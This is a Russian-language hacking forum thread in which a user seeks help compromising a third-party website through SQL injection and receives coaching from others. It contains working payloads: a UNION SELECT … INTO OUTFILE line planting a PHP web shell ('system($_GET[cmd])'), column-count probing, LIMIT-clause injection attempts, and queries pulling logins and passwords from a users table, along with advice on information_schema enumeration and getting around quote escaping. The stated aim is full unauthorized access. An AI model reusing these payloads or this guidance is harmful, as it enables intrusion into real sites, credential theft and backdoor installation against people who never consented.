Помогите плис. Есть сайт: бла...бла...бла/1.php?page=1 Я подставил: бла...бла...бла/1.php?page=1' Мне выдало: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in … Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in … Узнал установочную директорию сайта. Потом я подставил: -1+union+select+1,2,3,4,5,'<?php system($_GET[cmd]); ?>'+from+mysql.user+into+outfile+' бла...бла...бла/shzw.php '/* В виде HTML(изменилось такое): Раньше было: <form action=1.php?page =-1 method="POST"> на <form action=1.php?page =-1 union select 1,2,3,4,5,\'<?php system($_GET[cmd]); ?>\' from mysql.user into outfile \'…/shzw.php\'/* method="POST"> Но шелл не создался. И да кстати я не уверен что правильно подобрал количество полей.
magic quotes 1 или просто экранируются кавычки в запросе. инто аутфайл не сделаешь. если файл прив все таки есть, можешь лоудить кодируя в хекс... (пишет это тут раз в пиццотый, *пошел составлять мануал)))))
Судя по \'<?php system($_GET[cmd]); ?>\' то как сказал Чёрный БР экранируются кавычки и фай зплить через инто аутфайл нельзя. Подбири правильно кол-во столбцов и может в таблицах найдёшь чё интересного "*пошел составлять мануал)" омфг "/
Помочь взломать сайт (хотелось бы залить шелл). Я не знаю. А как проверить есть ли file_priv? А как узнать что я правильно подобрал столбцы??? Тогда ошибок не должно быть??? И есть ли какая-нибудь программа для автоматического подбора???
да ошибки могут и быть. страница с правильным кол-вом столбцов должна отличаться от страниц с другим кол-вом столбцов. В идеале увидешь свои циферке на странице)
Спасибо. За помощь буду подбирать. У меня еще такой вопрос: у меня есть исходный код этого скрипта и таблица(но она не полная, возможно нет некоторых столбцов), может ли мне это чем-то помочь в подборе столбцов.
Что за хня может быть: есть исходника скриптов, делаю МуСкул-инекцию после ЛИМИТ, а она не проходит. Делаю - display=1,1/* - нормально могу управлять ЛИМИТОМ. потом устанавливаю через коментарии, что 4 база МуСкула. делаю display=1,1+union+select+null,null,n.../* короче, скрипт перебирает, но вегда пустое значение, пробовал заменить пробулы на /**/ - ничего. Подскажите, что это может быть и варианты как обойти
Может Найди в коде запрос с уязвимой переменной, там будет что то типа Select blabla,blabla2,blabla3 from blablatable where blablaid=$id если так, то кол во столбцов 3 если будет типа select * from blablatable where blablaid=$id то надо уже смотреть таблицу ================================= upd инъекция после лимита don't work
я уже смотрел исходники там: SELECT DISTINCT cds_Prod.*, cc_ProductSummary.*, imPRICE.* FROM cds_Prod,cc_ProductSummary,imPRICE WHERE .... LIMIT $display,10 пробовал даже display=1,1 union SELECT cds_Prod.*, cc_ProductSummary.*, imPRICE.* FROM cds_Prod,cc_ProductSummary,imPRICE limit 1,1/* тоесть по идеи должно работать, но что-то не хочет. Может какие-то настройки сервера?
Spyder большое спасибо за помощь. Уже подобрал столбцы. Теперь надо использовать эту уязвимость чтоб получить полный доступ к сайту. Использовал USER(),VERSION(), DATABASE() – все получил. Но что с этого??? Я хочу получить полный доступ!!! Помогите плис.
Если версия >5 извлекай инфу из information_schema если <5 подбирай названия таблиц вручную Вообще почитай статьи, на ачате они в большом количестве, там всё хорошо описано Рекомендую статью Зако, она в этом разделе закреплена как важная ====== upd https://forum.antichat.ru/thread19844.html
Как прочесть пасс и логин когда я знаю как называется таблица, и столбец. Можно ли использовать например такое: 1.php?page=-1+union+select+1,2,3,4,5,6+from+users+where+id=1/* Если да, то почему у меня не получается ??? И еще вопрос можно ли изменить ячейку в любом столбце, например поставить в столбце «уровень админа» 1 или нет???
Изменить не получится пробуй так 1.php?page=-1+union+select+username,2,3,4,5,6+from+users+where+id=1/* 1.php?page=-1+union+select+login,2,3,4,5,6+from+users+where+id=1/* 1.php?page=-1+union+select+user,2,3,4,5,6+from+users+where+id=1/* Учи мат часть =-\
Если сайт перевести частично на мод.рерайт. К примеру, элементы вида ' index.php?page=1 ' преобразились в вид ' /page/1/ ' то есть получается, что проверка на фильтрацию сводится до минимума и вандалам не найти sql.inj, не так ли? Я не о том, что игнориуется она в случае перехода к чпу. Возможно ли благодаря мод.рерайт обезопасить портал? И может быть он не столь эффективен? Спасиб.)